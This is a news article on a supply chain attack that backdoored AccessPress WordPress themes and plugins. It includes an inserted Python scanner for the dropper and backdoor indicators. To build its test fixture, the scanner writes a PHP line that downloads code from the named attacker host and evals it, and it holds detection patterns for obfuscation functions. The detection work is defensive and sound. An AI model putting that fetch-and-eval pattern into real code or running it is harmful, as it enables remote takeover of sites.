Supply chain attack used legitimate WordPress add-ons to backdoor sites


Dozens of legitimate WordPress add-ons downloaded from their original sources have been found backdoored through a supply chain attack, researchers said. The backdoor has been found on “quite a few” sites running the open source content management system.

The backdoor gave the attackers full administrative control of websites that used at least 93 WordPress plugins and themes downloaded from AccessPress Themes. The backdoor was discovered by security researchers from Jetpack, the maker of security software owned by Automattic, provider of a hosting service and a major contributor to the development of WordPress. In all, Jetpack found that 40 AccessPress themes and 53 plugins were affected.

Unknowingly providing access to the attacker

In a post published Thursday, Jetpack researcher Harald Eilertsen said timestamps and other evidence suggested the backdoors were introduced intentionally in a coordinated action after the themes and plugins were released. The affected software was available for download directly from the AccessPress Themes website. The same themes and plugins mirrored on the official developer website for the WordPress project remained clean.

“Users who used software obtained directly from the AccessPress website unknowingly provided attackers with backdoor access, resulting in an unknown number of compromised websites,” Ben Martin, a researcher with Web security firm Sucuri, wrote in a separate analysis of the backdoor.

He said the infected software contained a script named initial.php that was added to the main theme directory and then included in the main functions.php file. Initial.php, the analysis shows, acted as a dropper that used base64 encoding to camouflage code that downloaded a payload from wp-theme-connect[.]com and used it to install the backdoor as wp-includes/vars.php. Once it was installed, the dropper self-destructed in an attempt to keep the attack stealthy.
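A defender-side check for the artifacts described above, added here as an illustration and not code from Jetpack or Sucuri: it scans a WordPress directory tree for the indicators the analysis names (the initial.php dropper, its include line in functions.php, and a wp-includes/vars.php that references the payload host or obfuscation primitives) and builds a constructed sample site to run against. Because vars.php is a legitimate core file the check inspects content rather than presence, and because the dropper deletes itself a missing initial.php is not treated as a clean result.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the article: the dropper's name, its include line in the
# theme's functions.php, the backdoor location, and the host the payload came from.
DROPPER_NAME = "initial.php"
BACKDOOR_PATH = Path("wp-includes") / "vars.php"
PAYLOAD_HOST = "wp-theme-connect.com"
INCLUDE_RE = re.compile(r"\b(include|require)(_once)?\b[^;]*initial\.php", re.I)
OBFUSCATION_RE = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)


def scan_wordpress(root):
    """Return (indicator, path) pairs found under a WordPress install root."""
    root, findings = Path(root), []
    for theme in (root / "wp-content" / "themes").glob("*"):
        # The dropper deletes itself after running, so its absence proves nothing.
        if (theme / DROPPER_NAME).is_file():
            findings.append(("dropper_present", str(theme / DROPPER_NAME)))
        functions = theme / "functions.php"
        if functions.is_file() and INCLUDE_RE.search(functions.read_text(errors="ignore")):
            findings.append(("dropper_included", str(functions)))
    vars_php = root / BACKDOOR_PATH  # a real core file, so check content, not presence
    if vars_php.is_file():
        text = vars_php.read_text(errors="ignore")
        if PAYLOAD_HOST in text:
            findings.append(("payload_host", str(vars_php)))
        if OBFUSCATION_RE.search(text):  # the genuine core vars.php uses none of these
            findings.append(("obfuscated_code", str(vars_php)))
    return findings


def build_constructed_site(base, compromised=True):
    """Write a minimal, constructed WordPress layout (stand-ins, not real malware)."""
    theme = Path(base) / "wp-content" / "themes" / "sample-theme"
    includes = Path(base) / "wp-includes"
    theme.mkdir(parents=True)
    includes.mkdir()
    if not compromised:
        (theme / "functions.php").write_text("<?php\n// clean theme\n")
        (includes / "vars.php").write_text("<?php\n$is_lynx = false;\n")
        return
    (theme / "functions.php").write_text("<?php\ninclude_once(get_template_directory() . '/initial.php');\n")
    (theme / "initial.php").write_text("<?php // stand-in for the dropper\n")
    (includes / "vars.php").write_text(f"<?php eval(base64_decode(file_get_contents('http://{PAYLOAD_HOST}/p')));\n")


def indicator_kinds(compromised=True):
    with tempfile.TemporaryDirectory() as base:  # scan a fresh constructed site
        build_constructed_site(base, compromised)
        return {kind for kind, _ in scan_wordpress(base)}
```

Point scan_wordpress at a real install root to use it; on a live site a hit on the include line or on vars.php content warrants comparing vars.php against a known-good core copy.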

The Jetpack post said evidence indicates that the supply chain attack on AccessPress Themes was carried out in September. Martin, however, said evidence suggests the backdoor itself is much older than that. Some of the infected websites had spam payloads dating back nearly three years. He said his best guess is that the people behind the backdoor were selling access to infected sites to people pushing web spam and malware.

He wrote, “With such a large opportunity at their fingertips, you’d think that the attackers would have prepared some exciting new payload or malware, but alas, it seems that the malware that we’ve found associated with this backdoor is more of the same: spam, and redirects to malware and scam sites.”

The Jetpack post provides full names and versions of the infected AccessPress software. Anyone running a WordPress website with this company’s offerings should carefully inspect their systems to ensure they’re not running a backdoored instance. Site owners may also want to consider installing a website firewall, many of which would have prevented the backdoor from working.

The attack is the latest example of a supply chain attack, which compromises the source of a legitimate piece of software rather than trying to infect individual users. The technique allows miscreants to infect large numbers of users, and it has the advantage of stealth, because the compromised software originates from a trusted supplier.

Attempts to contact AccessPress Themes for comment were unsuccessful.
